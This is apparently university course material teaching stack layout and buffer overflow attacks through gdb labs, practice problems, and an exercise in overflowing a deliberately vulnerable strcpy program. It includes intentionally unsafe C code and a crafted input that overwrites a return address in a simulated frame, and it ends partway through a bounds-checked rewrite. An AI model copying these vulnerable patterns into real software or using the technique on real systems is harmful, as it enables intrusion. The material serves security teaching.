Question 12: Modify the diagram shown in Question 11 to show what the stack should look like after these four instructions are executed. Remember that an integer (such as 4) takes up four bytes.

Enter nexti four times to execute these four assembly language instructions. Now, examine the stack to see if the picture you drew in Question 12 is correct.

Examine the stack? How do we do that? Well, to examine the word stored at the address contained in the stack pointer, we can enter:

    x/xw $esp

To examine the word stored at the address four bytes later, we can enter:

    x/xw $esp + 4

And so forth. As an alternative, you could use x/xw followed by the address you want to examine. For instance, to examine the word that is stored at the address 0xbffff80c I would enter:

    x/xw 0xbffff80c

Show your instructor your answer to Questions 11-12. If you are on the right track, you will be told to move on to Part 5!

Part 5. The Stack Frame for test_function

So, we will soon jump to the function named test_function.
As we discussed in lecture, this will establish a new stack frame. After the function named test_function is done, we have to be able to return to main's stack frame. To return to the main function, main must save on the stack:

• The proper return address for eip
• The prior value of the base pointer ebp

Let's first establish what these values should be.

Question 13: What is the old (prior) value of the base pointer that must be saved on the stack? Look carefully at the assembly language code for main shown back in Part 3 of this Security Exercise.

Question 14: What is the value of the return address that we must save, so that the instruction pointer can be reset back to the correct line of code after the function call to test_function is complete?

Let's jump into the function named test_function. Enter:

    list test_function
    break 8
    continue

You should see:

[gdb output: the program stopped at line 8, not reproduced in this text.]

Notice that by inserting a breakpoint at line 8, we are within (but at the end of) test_function.

Question 15: What address is stored in the instruction pointer (i.e., the eip register)?

Question 16. Based on your answer to Question 15, what is the assembly language instruction that the instruction pointer is pointing to (i.e., the next instruction that will execute, but has not yet executed)?

Question 17: What are the addresses stored in the stack pointer (esp) and the base pointer (ebp)?

Question 18. Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must remember that these values are in hexadecimal!)

Show your instructor your answer to Questions 17-18. If you are on the right track, you will be told to move on to Part 6!

Part 6: Do you have the skills of a hacker?

Now you will be put to the test! Have you developed hacking skills? Let’s see!

Question 19: Using all the skills you have learned so far, attempt to determine the contents of the stack frame for test_function as well as the additional memory locations below the base pointer.
Fill in your answers on the picture for Question 19. The arrow on the figure shows where you should place the base pointer (ebp). All other info should be based upon anchoring the base pointer at the location shown. Specifically:

• Show the address for each byte (last four hex digits)
• Where is flag? (Hint: convert the value to hexadecimal)
• Where is buffer? (Hint: You should hunt for buffer[0] )
• Where is the return address (see your answer to Question 14)?
• Where is the old value of the base pointer (see your answer to Question 13)?

Security Exercise 6 Answer Sheet

Name: __________________

Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:

Question 11 and Question 12:

    Address    Value stored

Question 13:
Question 14:
Question 15:
Question 16:
Question 17:
Question 18:

Question 19 is on the next page.

    Address    Value stored

Chapter 7: The Buffer Overflow

Objectives:

(a) Describe the buffer overflow attack, determine what features of C make it possible, and identify who is responsible for memory management in C.
(b) Demonstrate the ability to craft simple buffer overflow exploits
(c) Explain how specific buffer overflow attacks work by describing stack operations.
(d) Analyze programs that submit input via the command line.

1. The Buffer Overflow Attack

1.1. Introduction

The very first major attack on DoD computer networks took place in February of 1998 and lasted for over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been used countless times ever since. Many famous attacks—the Morris Worm, the Code Red Worm, the SQL Slammer Worm, the Twilight Hack, Blaster, Conficker—used the buffer overflow as a primary attack vector.
The recent Stuxnet worm used the buffer overflow as one of many attack vectors. The buffer overflow attack is still exceedingly common. An examination of a two-week period in early January 2014 proves the point. On January 3, 2014, the SANS Institute reported a newly discovered buffer overflow attack against the ubiquitous Linksys router. On January 9, 2014 a buffer overflow exploit was discovered in the “X Window” system that underpins many Linux desktops—although discovered in January 2014 this bug was waiting around to be discovered for the previous 22 years! On January 15, 2014, a penetration testing firm announced the discovery of a zero-day flaw for executing a buffer overflow attack on a common SCADA system used in the US, the UK and Australia. A security researcher described the potential ramifications of this latter attack as “the stuff of modern-day nightmares.”

To be sure, the buffer overflow attack is not the only way to cripple a computer system. There are many other ways to attack, such as cross-site scripting, SQL injection, format string errors, and on and on. You may have learned in SI110 that the Department of Homeland Security worked together with the SANS Institute, Apple and Oracle back in 2011 to develop a list of the top 25 software vulnerabilities, and the “classic buffer overflow” came in third, behind SQL injection and OS command injection (cross-site scripting was 4th). The buffer overflow was the top vulnerability from 2000 through 2005, and has bounced around the top three spots ever since. In February 2013, the security firm Sourcefire surveyed Common Vulnerability Scoring System (CVSS) data from 1988 to 2012, and found that buffer overflows were the most-often reported vulnerability. Of the vulnerabilities assigned a category of “high severity”, buffer overflows comprised over a third of the total.
Security analyst Paul Roberts notes that “the stubborn staying power of buffer overflows for more than two decades – despite gallons of industry ink spilled on the problem – is dispiriting and has to get us thinking about what it is we’re doing wrong as an industry.”

1.2. In a Nutshell.

The simple basis for the attack can be appreciated by examining the following section of C code:

    int k = 1000 ;
    char my_stuff[ 512 ] ;
    my_stuff[ k ] = 'A';

What happens if this code is executed? This array is only allotted 512 bytes; i.e., this array holds character variables my_stuff[0] through my_stuff[511]. The programmer who wrote the third line of code seems unaware that the last element of the array is my_stuff[511], since this third line of code assigns a value to the non-existent variable named my_stuff[1000]. When this code is executed, a byte of memory 488 bytes beyond the end of the array will be overwritten with the character 'A'. This error will not be caught at compile-time. In a nutshell, the problem is that C compilers do not check for going beyond the bounds of an array.

This is a big concern because almost all major operating systems are written in C. Additionally, many popular applications are written in C. You might be wondering: What exactly happens when the code above is run? The unfortunate answer is: Who knows? Perhaps nothing noticeable will occur. Perhaps disaster will occur.

Practice Problem 7.1

What feature of the C language makes a buffer overflow attack possible?

Solution:

1.3. Back to the Stack

Recall that when a program is to be executed, the operating system reserves a block of main memory for it. The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language instructions.) The memory allotted to the program in the text section does not change; it does not shrink or grow, since the program does not shrink or grow while it is being executed.
The “stack” is the memory that the program has available to store information during execution. For example, the program’s variables are stored on the stack. Let’s look at the program in the figure and examine the stack as it executes.

The program begins at the main function, and the variables used by the main function are placed on the stack. When the instruction pointer is at the location shown in the figure on the right, the stack appears as in the figure on the left. Recall that we keep track of the stack using the base pointer (ebp), which marks the bottom of the current stack frame, and the stack pointer (esp), which points to the top of the stack (the lowest address currently in use). Each function gets to place its variables on the stack. The part of the stack that belongs to a function is called that function’s stack frame. So, the picture depicts the current stack frame for the main function.

Now, the next instruction has us call the function named happy_times. The values of the arguments are placed on the stack in preparation for the function call. The stack, just before the call, is shown in the next figure.

The function happy_times also has a variable (the array named alpha_code), and it needs to be allotted its own (separate) stack frame. But after happy_times is over (of course, happy times are never over at USNA…), we will jump back to the main function, so we still need to keep the stack frame for main undisturbed. Additionally, after happy_times is over, we need to resume program execution at the correct point (i.e., the point in main where we left off when we reached the function call). So… what do we do? We place the return address (the address of the next instruction after the function call) on the stack, then the old value of the base pointer, and then we allot space for happy_times’ variable, as shown below.
Recall from last lecture that in a function call from main to another function, the stack is organized as in the generic picture from that lecture; note that our example conforms to this organization, as it must.

Now, suppose that the function happy_times, as part of its code (shown as “more code” in the figure), prompts the midshipman to enter his alpha code. The function happy_times uses the character array named alpha_code to hold the value that the midshipman types in. We have seven bytes reserved on the stack for the alpha code: six digits plus the NULL terminator. If all works well, all well and good. And everything always works well at USNA. Right?

Of course not! Our midshipman was sleepy, and when he was prompted to enter his alpha code (which happens to be 151234) he dozed off for a micro-nap and accidentally entered:

    1512344444444444444444444 <enter>

He entered a total of 25 characters. Think about this. What happens?

When the 25 characters are fed into the array alpha_code, the characters beyond the seventh (and the NULL that scanf appends) land beyond the end of the array and start overwriting whatever sits above it on the stack! In our picture that is the saved base pointer and then the return address. Suppose the return address is overwritten. What will happen when function happy_times is finished executing? The “return address” that gets used will consist of some of the characters from the midst of the alpha string that was entered, so the instruction pointer will jump to some spurious address. And then... the program will most likely crash with a segmentation fault. A segmentation fault occurs when a program attempts to access memory outside the region of main memory that it has been allotted. This sequence of events, if done intentionally, is called a buffer overflow attack or a stack smashing attack!!!

Practice Problem 7.2 Describe the mechanism by which a segmentation fault occurs.

Solution:

2. A More Malicious Buffer Overflow Attack

2.1.
The Buffer Overflow Attack on Steroids

Our sleeping midshipman was not trying to do anything malicious; he just fell asleep, like all midshipmen do. But how could the fundamental problem with C described above be exploited to do something truly evil? Suppose I chose an alpha code that was not really an “alpha code”... …heh, heh… …but was instead a valid machine language program.

So, now, the hacker has placed a program into memory. But how can the hacker make use of this program? Think about this: suppose that when the hacker types in his executable code, he takes care to overwrite the return address as well, so that the four bytes that previously held the correct return address now contain the address of alpha_code, i.e., the address at which his program begins.

Consider the effect of this action. When function happy_times is done, the “return address” will be placed in the eip register. But the return address has been adjusted to be the start of the executable program that has been surreptitiously placed in memory, so the hacker’s program will start executing. In summary, the hacker has placed his own program in memory and made it execute. The hacker has executed a buffer overflow attack. (Two things have to go the hacker’s way for this to work as described: he must know where alpha_code will sit on the stack, and the processor must be willing to execute instructions fetched from the stack. Modern systems randomize stack addresses and mark the stack non-executable to frustrate exactly this.)

When examining the potential for a buffer overflow, the programmer should consider how a function’s variables are placed on the stack. In the convention used throughout these notes, the first variable declared is placed on the stack first, the second variable declared is placed on the stack next (above the first, at a lower address), and so forth. (A real compiler is free to reorder and pad a function’s variables, which is one reason the homework has you measure the layout in the debugger rather than assume it.)

Practice Problem 7.3 For the pawn function below, is it possible to overwrite the value you will get for your item with an amount of your choosing by overwriting the value variable on the stack during the scanf( ) call? Explain.

    void pawn()
    {
        char item[12];
        int value = 100;
        printf("What have you come to sell? ");
        scanf("%s", item);
    }

    int main()
    {
        pawn();
    }

Solution:

Practice Problem 7.4 When the echo_string function is called in main from the following code sample, the stack pictured in the figure is created.

    #include<stdio.h>

    void echo_string()
    {
        int count;
        char entered_string[10];
        printf("Enter a string: ");
        scanf("%s", entered_string);
        for(count=0; count < 10; count=count+1)
        {
            printf("%s\n", entered_string);
        }
    }

    int main()
    {
        echo_string();
    }

Assuming there is no padding (extra space) when the frame is created, how many characters can be entered before the return address is overwritten?

Solution:

2.2. A Possible Solution: Don't Use C!

If this problem exists simply because C compilers do not check for going beyond the bounds of an array, an easy way to solve it would be to avoid using the C language altogether. In fact, more modern programming languages such as Java and C# will not allow a programmer to run beyond the bounds of an array. Why not simply abandon C and announce to the world: Problem Solved?

We cannot simply abandon C, since too many C programs are in circulation. Moreover, programmers would not want to abandon C even if a magic wand could suddenly convert all C legacy code into Java programs! Recall from an earlier lecture that even today, a great many programmers program in C and prefer to. The C programming language is very popular because it executes quickly and it provides the programmer with a high level of control over the program. But with this power comes responsibility: data integrity in C is the programmer's responsibility. If the responsibility for data integrity were taken away from the programmer and given to the compiler instead, the compiler would consistently and constantly check that we never run beyond the bounds of an array (which is good), but program execution would be slower (which is bad).
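The frame picture of sections 1.3 and 2.1 (alpha_code, then the saved base pointer, then the return address) can be reproduced in a few lines of C so that you can see exactly which bytes each keystroke lands on. The following is an added example, not code from the notes: it models a frame as a byte array laid out the way the notes draw it (no padding, the overflowed array lowest, any other locals between it and the saved ebp), performs the same unchecked copy that scanf("%s") does, and reports what the saved-ebp and return-address slots hold afterwards. The starting values 0xbffff828 and 0x0804841e are placeholders chosen to look like the lab VM, the layout struct and the function names are my own, and the copy stops at the end of the model frame only to keep the model itself in bounds.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the notes.  A byte-level model of a stack
 * frame laid out the way the notes draw it, with no padding:
 *
 *   offset 0 ..          the char array being overflowed (top of stack)
 *   then `below` bytes   any other locals between it and the saved ebp
 *   then 4 bytes         saved base pointer (old ebp)
 *   then 4 bytes         return address (loaded into eip by ret)
 *
 * Higher offsets are higher addresses, so writing past the end of the array
 * walks toward the saved ebp and then the return address.  A real compiler
 * may reorder and pad locals, which is why the homework has you measure the
 * offsets in gdb instead of assuming them. */

#define MAX_FRAME 64                 /* the model holds frames up to this size */

struct layout {
    size_t buf_size;                 /* bytes in the char array */
    size_t below;                    /* other locals between array and saved ebp */
};

static const uint32_t INITIAL_EBP = 0xbffff828u;   /* assumed old ebp */
static const uint32_t INITIAL_RET = 0x0804841eu;   /* assumed return address in main */

/* Smallest number of typed characters whose terminating NUL lands on the
 * first byte of the saved ebp, and of the return address, respectively. */
size_t chars_that_first_touch_ebp(const struct layout *l) { return l->buf_size + l->below; }
size_t chars_that_first_touch_ret(const struct layout *l) { return l->buf_size + l->below + 4; }

/* x86 is little-endian: the low byte of a 4-byte value sits at the low address. */
static void put_u32(unsigned char *p, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

static uint32_t get_u32(const unsigned char *p)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)p[i] << (8 * i);
    return v;
}

/* Builds the frame, then does what scanf("%s", buf) does: copies every
 * character plus the terminating NUL starting at the array and keeps going
 * past its end.  The copy stops at the end of the modelled frame only so the
 * model itself stays in bounds; a real overflow would continue upward. */
static void fill_frame(const struct layout *l, const char *input, unsigned char *frame)
{
    size_t frame_size = l->buf_size + l->below + 8;
    assert(frame_size <= MAX_FRAME);
    memset(frame, 0, MAX_FRAME);
    put_u32(frame + l->buf_size + l->below, INITIAL_EBP);
    put_u32(frame + l->buf_size + l->below + 4, INITIAL_RET);

    size_t n = strlen(input) + 1;    /* +1: scanf appends the NUL */
    if (n > frame_size)
        n = frame_size;
    memcpy(frame, input, n);
}

/* What the saved-ebp slot holds after the user enters `input`. */
uint32_t saved_ebp_after(const struct layout *l, const char *input)
{
    unsigned char frame[MAX_FRAME];
    fill_frame(l, input, frame);
    return get_u32(frame + l->buf_size + l->below);
}

/* What the return-address slot holds after the user enters `input`. */
uint32_t ret_addr_after(const struct layout *l, const char *input)
{
    unsigned char frame[MAX_FRAME];
    fill_frame(l, input, frame);
    return get_u32(frame + l->buf_size + l->below + 4);
}

/* happy_times: char alpha_code[7] and nothing else between it and saved ebp. */
const struct layout happy_times_layout = { 7, 0 };

int main(void)
{
    const struct { const char *label; const char *input; } runs[] = {
        { "151234 (fits)",           "151234" },
        { "1512344 (NUL hits ebp)",  "1512344" },
        { "sleepy midshipman",       "1512344444444444444444444" },
        { "crafted: ret=0xbffff810", "AAAAAAA" "BBBB" "\x10\xf8\xff\xbf" },
    };
    printf("alpha_code[7]: %zu chars reach the saved ebp, %zu reach the return address\n",
           chars_that_first_touch_ebp(&happy_times_layout),
           chars_that_first_touch_ret(&happy_times_layout));
    for (size_t i = 0; i < sizeof runs / sizeof runs[0]; i++)
        printf("%-24s saved ebp=0x%08x  ret=0x%08x\n", runs[i].label,
               saved_ebp_after(&happy_times_layout, runs[i].input),
               ret_addr_after(&happy_times_layout, runs[i].input));
    return 0;
}
```

Compile it with gcc and run it to see the four cases: a six-digit code that fits, a seven-character code whose terminating NULL alone zeroes the low byte of the saved ebp, the sleepy midshipman's 25 characters, and a crafted entry that fills alpha_code, replaces the saved ebp with filler, and drops the chosen address 0xbffff810 into the return-address slot byte by byte in little-endian order. The chars_that_first_touch_* functions give the arithmetic the homework asks you to verify in gdb; the model assumes the notes' layout, and a real frame may carry padding that shifts every offset.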
Generally, users want their programs (whether they be operating systems, office software, application programs or games) to execute quickly. C executes quickly since the compiler does not verify data integrity. Yet, with the responsibility for data integrity resting on the programmer's shoulders, buffer overflow errors can occur if the programmer is not careful. A good analogy is provided by USNA instructor Nick Rosasco:

C is like a workbench with saws and power tools and high-voltage drops and spinning lathes all out in the open, without safeguards and protections. For a master craftsman who knows his job very well, this environment would be ideal for productive work, with the understanding that the craftsman has to be responsible for his safety. For the novice, this environment would be very dangerous. Conversely, a workbench that required the user to constantly interact with multi-level interlocked protection mechanisms and cumbersome safety features would be much safer for the novice, but would drive the skilled craftsman insane.

As with workbenches, so with programming languages: the intentional lack of safety in C translates into greater flexibility and improved performance… and risk.

In order for you to write your own buffer overflow attacks, we have to add a little bit to your C repertoire. For now, we have to cover command line arguments and the exit function. It’ll be fun.

3. More Fun with C

3.1. Command Line Arguments.

Up to this point, we have written the first line of the function main as

    int main()

However, main is a function that we can pass arguments to. As we already know, main is special, and passing arguments to the main function also takes place in a special way. The main function is more formally written as

    int main (int argc, char *argv[])

The parameter argc contains the number of arguments passed to main, and the parameter argv is an array of strings, with each argument stored in one of the array locations.
First, let’s get a little bit comfortable with this notation. If we type in the following program:

    #include <stdio.h>

    int main( int argc, char *argv[] )
    {
        int i;
        printf("Arguments to this program, on the command-line:\n");
        for( i = 0; i < argc; i = i + 1 )
            printf("%s\n", argv[i]);
    }

then, when executing it, we would see each item from the command line printed on its own line. Here is what is happening. When you execute a C program, the operating system counts the total number of separate items entered on the command line, including the program name itself, and places that integer in the variable argc. Each separate item you entered is placed, as a string, one-by-one, in the array of strings argv. So, if I were to type:

    ./a.out one 2 3.45 who?

then:

    argv[0] = "./a.out"
    argv[1] = "one"
    argv[2] = "2"
    argv[3] = "3.45"
    argv[4] = "who?"

and what is the value of argc? The answer: 5.

Practice Problem 7.5 For the following program invocation:

    midshipman@EC310 ~$ ./a.out wait 8 mate

(a) What is the value of argc?
(b) What is the value of argv[1]?
(c) What is the data type of argv[2]?

Solution: (a) (b) (c)

Practice Problem 7.6 Pertaining to taking in command line arguments for a program, choose the best description for argc.
(A) holds the number of command line arguments excluding the program name.
(B) holds the total number of command line arguments available to the program.
(C) holds the number of integer variables entered at the command line before the program begins.
(D) None of the above.

Solution:

Practice Problem 7.7 In the following sentence, circle the correct choices. argv is a(n) array / index / stack used to store each command line parameter / index / argument in a binary / string / numeric format.

Solution:

3.2. The exit statement.

Sometimes we would like to intentionally terminate a program “gracefully” (instead of letting the program crash and burn). This can be accomplished with a call to the exit function. When using exit, we must add the directive #include <stdlib.h>.
An example:

    #include <stdio.h>
    #include <stdlib.h>

    int main()
    {
        float x, y;
        printf( "This program divides x by y \n" );
        printf( "Enter x and y: " );
        scanf( "%f %f", &x, &y );
        if( y == 0 )
        {
            printf( "Divide by 0!\n");
            exit(1);   // For us, it doesn't matter what number we use
        }
        else
        {
            printf( "x/y is %f\n" , x/y);
        }
    }

Problems

1. What features of the C language make a buffer overflow attack possible?

2. Answer the following questions concerning how a program is stored in memory during its execution.
(a) Which segment of memory has contents that remain unchanged during program execution?
(b) Does the programmer have complete control over how the stack is organized?
(c) What is the relationship between the order in which variables appear in a function and the order in which these same variables are stored in the function's stack frame?
(d) What important registers are used to define the boundaries of a stack frame?
(e) Suppose main calls a function named fun. After all the commands of fun have executed, how does the program know to continue at the exact location in main where it left off?
(f) Is a source code file permitted to have more than one function?
(g) If your answer to (f) was "no", explain why that is the case. If your answer to (f) was "yes", explain how the operating system knows where to begin executing your program if the source code file contains multiple functions.

3. Segmentation Fault

Carefully enter the following program using nano. Notice that the program has no blank lines (the breakpoints used below refer to its line numbers).

    #include<stdio.h>
    void happy_times( int x , int y )
    {
        char alpha_code[ 7 ];
        printf("\nEnter your alpha code:" );
        scanf( "%s" , alpha_code );
        printf("\nYour alpha code is: %s\n\n", alpha_code );
    }
    int main( )
    {
        int a = 77;
        int b = 21;
        happy_times( a , b);
    }

Execute the program, entering just the numeric portion of your alpha code. You should see your alpha code echoed back. Now, rerun the program entering a ridiculously long alpha code.
You should see a segmentation fault.

Recall that a segmentation fault occurs if a program attempts to access memory beyond the boundaries of the main memory that the operating system has allotted to it. In this homework problem we will explore in depth the cause of this segmentation fault. Let's run our program (which I've named happy.c) in the debugger by entering:

    gcc -g happy.c
    gdb -q ./a.out
    set dis intel
    list main
    break 13
    run
    nexti
    nexti
    nexti
    nexti          (exactly four nexti's)

If you now enter i r eip you should confirm that the next instruction to execute is the instruction at address 0x8048419 (the address on the EC310 VM; a different build may place it elsewhere). If you now enter disass main you should verify that this very next instruction is the function call. The important point of all this is to note that you are still in main (but just barely!). Recalling the generic picture of the stack, and noting that the call has not yet executed, the stack should consist of just main's variables and the function's arguments.

(a) Our goal is to locate main's variables and the function's arguments on the stack. Recall that main's variables (a and b) are stored in binary, which we can read as hexadecimal numbers. Convert the values of a and b to hexadecimal and write them below as eight hexadecimal digits each (recall that an integer is stored as four bytes, and four bytes equates to eight hexadecimal digits):

Note: For Parts (b) – (i) you will fill in the table at the end of this problem.

(b) Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table, showing where the base pointer (label as EBP-main) and stack pointer (label as ESP-main) are pointing.
(c) Look at 40 bytes starting at the stack pointer by entering

    x/40xb $esp

You should see 40 bytes of memory starting at the address held in esp (0xbffff800 on the VM): the first byte displayed is the contents of memory location 0xbffff800, the next is the contents of 0xbffff801, the next 0xbffff802, and so on. Locate main's variables and the function's arguments on the stack. Fill in the table, annotating the locations of these four values. Label these as (main variable: a), (main variable: b), (function argument: x) and (function argument: y).

(d) Now enter

    break 2
    continue
    nexti

The program is now at the point where the old value of the base pointer and the correct return address have been placed on the stack. What should be stored as the correct return address? (Hint: enter disass main and determine the address of the next instruction after the function call.) What should be the saved value of the base pointer?

(e) Examine the value of the stack pointer ( i r esp ). Fill in the value in the table, showing the stack pointer's location (label as ESP-main-revised).

(f) Look at 40 bytes starting at the stack pointer by entering x/40xb $esp. Locate the saved value of the base pointer and the return address on the stack. Fill in the table, annotating the locations of these two items. Label these as (saved base pointer) and (return address).

(g) Now enter

    break 8
    continue

When prompted to enter your alpha code, enter: AAAAAA

Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table, showing where the base pointer (label as EBP-happy_times) and stack pointer (label as ESP-happy_times) are pointing.

(h) Locate your alpha code in the stack frame for happy_times. Do this by examining 40 bytes starting at the stack pointer. Note that the capital letter A is equivalent to hexadecimal 0x41. Fill in the table, annotating the location of the string alpha_code. Note that the NULL that terminates the string is part of the string.

(i) Now, examine your memory drawing.
How many characters would you have had to enter for your alpha code before you start to overwrite the saved value of the base pointer (remember that the NULL is automatically added)? Overwriting the saved value of the base pointer will (almost always) cause a segmentation fault: once happy_times returns, main goes on using the corrupted value in ebp to locate its own variables and, eventually, its own return address, and those accesses land outside the region of main memory given to the program.

(j) Exit the debugger (by entering quit) and run your program by entering ./a.out. Enter an alpha code of size equal to the number of characters you calculated in part (i). Did you get a segmentation fault? (You should have!)

(k) Enter an alpha code of size one less than the number of characters you calculated in part (i). Did you get a segmentation fault? (You should not have.)

(Worksheet: a table with columns Address, Value and Description, one row for each byte from BFFFF7CD through BFFFF81A, to be filled in for parts (b) through (i).)

4. Given the following code snippet:

    char first_name[6] = "Alice";
    strcpy(first_name, "Alexander");

(a) Will the C compiler state that there is an error?
(b) What potentially dangerous situation occurs because of the snippet above?
(c) What is the minimum size necessary for the array first_name to prevent this error?
(d) There are at least two ways to change the above code to prevent the above error from happening. Describe one.

5.
When the greetings function is called in main from the following code sample, the stack pictured below is created.

    #include<stdio.h>

    void greetings()
    {
        int name_len = 15;
        char name[name_len];
        int year = 2014;
        printf("Enter your name: ");
        scanf("%s", name);
        printf("Hello: %s! The current year is %d.\n", name, year);
    }

    int main()
    {
        greetings();
    }

Stack (top of stack, lowest address, listed first):
    year
    name
    name_len
    prev_ebp
    ret_addr

(a) Assuming there is no padding (extra space) when the frame is created, how many characters must the user enter to overwrite only the first byte of the return address?
(b) Is it possible to change the value of year by performing a buffer overflow attack? Why or why not?

Security Exercise 7

Part 1. Initial Setup

Today you will use the program sx7.c, which has been written for you and placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the home directory prompt (make sure you are at your home directory!):

    midshipman@EC310:~ $ cp ec310code/sx7.c work

(Sidebar: “Most people give up just when they're about to achieve success. They quit on the one-yard line. They give up at the last minute of the game, one foot from a winning touchdown.” By the way… who am I?)

Verify that you have sx7.c in your work directory by changing to the work directory:

    cd work

and then listing the files in the work directory:

    ls

If you do not have sx7.c in your work directory, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.

Part 2.
The Program

Use nano to examine the program sx7.c, which is also shown below:

    #include<stdio.h>
    #include<string.h>
    #include <stdlib.h>
    int main( int argc, char *argv[ ] )
    {
        char schoolone[ 5 ] ;
        char schooltwo[ 5 ] ;
        if( argc <= 2 ) exit(1);
        strcpy( schoolone , argv[ 1 ] );
        strcpy( schooltwo , argv[ 2 ] );
        printf( "The best school is %s \n" , schoolone );
        printf( "The second-best school is %s \n" , schooltwo );
    }

Save your program ( Control-o ), exit nano ( Control-x ), and then compile your program using

    gcc -g sx7.c

Before running your program, answer the following questions:

Question 1: If I were to enter (but do not yet enter):

    ./a.out Army Navy

what would be the values of argc, argv[ 0 ], argv[ 1 ] and argv[ 2 ]?

Question 2: If I were to enter (but do not yet enter):

    ./a.out

what would happen?

Now, run the program by entering ./a.out and make sure you understand the results. Now run the program a second time by entering

    ./a.out Army Navy

and again, make sure you understand what the program is doing. If you do not understand the operation of the program, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 3.

Part 3. Your first experience at hacking!

Here is the background on this program: Your friend Cadet Lessheimer, who is attending USNA from the U.S. Military Academy on an inter-service exchange program for the socially impaired, has written the program on the preceding page. (Photo caption: um… go army…??… Cadet Lessheimer, USMA, Class of 2016.) He says: “Let’s run my program! I’ll enter the name of my school and then you, my dear midshipman friend, will enter the name of your school, and then we’ll see which school the program says is Number 1.” Since Cadet Lessheimer goes first, and always puts in Army, the string Army will be placed in argv[1].
Since the program copies argv[1] into schoolone, and then announces that schoolone is the best school, the program is designed so that it will always say:

    The best school is Army
    The second-best school is (whatever the midshipman entered)

As you can see, he is named Cadet Lessheimer for a reason.

YOUR MISSION: HACK THE CADET’S PROGRAM! Your hack should work as follows: Cadet Lessheimer runs the program and enters Army, and then lets you enter your school. After you make your entry, the program prints out:

    The best school is Navy

thus shocking the Cadet into a mind-numbing stupor. Moreover, the output also indicates that the second-best school is Navy as well (the notes show a screen capture of such a run). Note that you cannot make any changes to the C program! So… how will you accomplish this? By designing a buffer overflow! (Really… you will!)

Enter the following commands:

    gcc -g sx7.c
    gdb -q ./a.out
    set dis intel
    list
    <Enter>

(The reason for the second <Enter> is to display the full program; entering list once displays only the first ten lines.)

Here is what you would like to accomplish: you want to examine the stack while the program is running, and determine whether you can overwrite the cadet's entry by using a buffer overflow. Look at the program listing, and then:

STEP 1: Determine the proper breakpoint for your program. You want the program to run up to a certain point, then freeze at a breakpoint, allowing you to examine the stack. Where should you set the breakpoint? Looking at the listing, setting the breakpoint at line 2 would clearly be worthless, since nothing significant has occurred by that line of the program. You want to set the breakpoint at a point after the command line arguments (i.e., the cadet's entry, which is Army, and your entry) have been copied onto the stack.

Question 3: Where should you set the breakpoint? STOP and show your instructor or lab tech your answer to Question 3.
With their okay, proceed to Step 2 below.

STEP 2: Run to the breakpoint and examine the stack. To set a breakpoint and run a program that requires command line arguments (where, let’s say, the command line arguments are Army and Navy), you would enter:

    break <whatever number you have for Question 3>
    run Army Navy

For example, if you answered Question 3 by deciding the breakpoint should be at line 4, you would enter:

    break 4
    run Army Navy

Now, examine the stack and base pointers by entering

    i r esp
    i r ebp

Question 4: How many bytes are on the stack (i.e., between the stack pointer and the base pointer)?

Examine the stack by entering:

    x/60xb $esp

Question 5: Label, in the Description column, the locations of the addresses to which main's stack and base pointer point. Label the base pointer as EBP-main and the stack pointer as ESP-main.

Question 6: Locate on the stack where the two command line arguments are stored. Recall that the program copies argv[1] into schoolone and argv[2] into schooltwo. Show these in the table, labeling them as schoolone – cadet's entry and as schooltwo – midshipman's entry.

STEP 3: Determine the attack technique.

Question 7: Based on your picture of the stack, which is true (a or b):
(a) If schoolone is long enough, it can overwrite schooltwo
(b) If schooltwo is long enough, it can overwrite schoolone

Question 8: Based on your picture of the stack, design your buffer overflow. Write a clear explanation of how your attack works in the answer space for Question 8.

Question 9: Demonstrate your buffer overflow attack during a run of the program. Your instructor or lab tech will sign off on this.
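Having hacked sx7.c, it is worth seeing how the cadet should have written it. The following is an added example, not the exercise's program: a size-aware copy function built on snprintf replaces the two strcpy calls, and the program refuses any entry that would not fit in its 5-byte array instead of letting one argument spill into the other. The names bounded_copy and rank_schools are my own. Note that an array name decays to a pointer when it is passed to a function, so the callee cannot recover the array's size from the pointer; it has to be passed as a separate argument, which is why every function here takes a size alongside each buffer.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the program from the exercise: sx7.c rewritten so that
 * neither command-line argument can run past its 5-byte array.  The names
 * are my own. */

enum copy_status { COPY_OK, COPY_TRUNCATED, COPY_BAD_ARGS };

/* Size-aware replacement for strcpy(dst, src).  An array decays to a pointer
 * when passed, so the caller must say how big dst is.  snprintf always
 * NUL-terminates within dst_size and returns the length src needed, which
 * is how truncation is detected.  (strncpy, by contrast, leaves dst without
 * a terminator when src is too long.) */
enum copy_status bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst == NULL || src == NULL || dst_size == 0)
        return COPY_BAD_ARGS;
    int needed = snprintf(dst, dst_size, "%s", src);
    if (needed < 0)
        return COPY_BAD_ARGS;
    return (size_t)needed < dst_size ? COPY_OK : COPY_TRUNCATED;
}

/* The cadet's logic, fixed: both entries must fit (including the NUL) or
 * nothing is copied and the function reports failure.  Refusing is the
 * right choice here; silently keeping "Navy" out of "NavyNavyNavy" would
 * only hide the problem. */
int rank_schools(const char *first, const char *second,
                 char *schoolone, size_t one_size,
                 char *schooltwo, size_t two_size)
{
    if (strlen(first) >= one_size || strlen(second) >= two_size)
        return 0;                          /* would overflow: refuse it */
    bounded_copy(schoolone, one_size, first);
    bounded_copy(schooltwo, two_size, second);
    return 1;
}

int main(int argc, char *argv[])
{
    char schoolone[5];
    char schooltwo[5];

    if (argc != 3) {
        fprintf(stderr, "usage: %s <school one> <school two>\n", argv[0]);
        return 1;
    }
    if (!rank_schools(argv[1], argv[2], schoolone, sizeof schoolone,
                      schooltwo, sizeof schooltwo)) {
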